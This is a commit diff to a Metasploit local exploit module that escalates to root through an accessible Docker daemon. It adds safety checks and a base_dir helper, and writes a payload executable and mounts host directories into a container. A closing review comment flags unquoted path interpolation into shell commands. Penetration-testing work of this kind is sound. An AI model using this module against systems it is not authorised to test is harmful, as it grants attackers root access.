
Land #11239, Add check for writable and nosuid WritableDir

wchen-r7 committed Feb 9, 2019
2 parents e82dc95 + fe6956d commit a380bb6df12390c8fb07629c455a7b7f4a23032d
Showing with 31 additions and 2 deletions.
  1. +31 −2 modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

@@ -29,12 +31,18 @@ def initialize(info={})
}
))
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
])
end

def base_dir
datastore['WritableDir'].to_s
end

def check
if cmd_exec('docker ps && echo true') =~ /true$/
print_good("Docker daemon is accessible.")
Exploit::CheckCode::Vulnerable
else
print_error("Failed to access Docker daemon.")
@@ -43,8 +51,29 @@ def check
end

def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end

unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end

pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
print_status("Writing payload executable to '#{exe_path}'")

write_file(exe_path, pl)
@@ -59,7 +88,7 @@ def exploit
end

def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")

%Q{
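Review bot: `base_dir` returns the raw `WritableDir` string, and the new code interpolates it unquoted into `exe_path` in `exploit` and into the `-v #{dep}:#{dep}` list in `shell_script`, so a value containing whitespace or shell metacharacters would change the command that runs on the host under test. The commit checks that the directory is writable and not mounted nosuid, but it does not check the shape of the path. Rejecting anything that is not a plain absolute path inside `base_dir`, or building the option as `"-v #{Shellwords.escape(dep)}:#{Shellwords.escape(dep)}"`, would keep the resulting command predictable. How `dep_options` and `exe_path` are consumed afterwards is inferred, because the `%Q{` body of `shell_script` and the rest of `exploit` lie outside the visible hunks.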
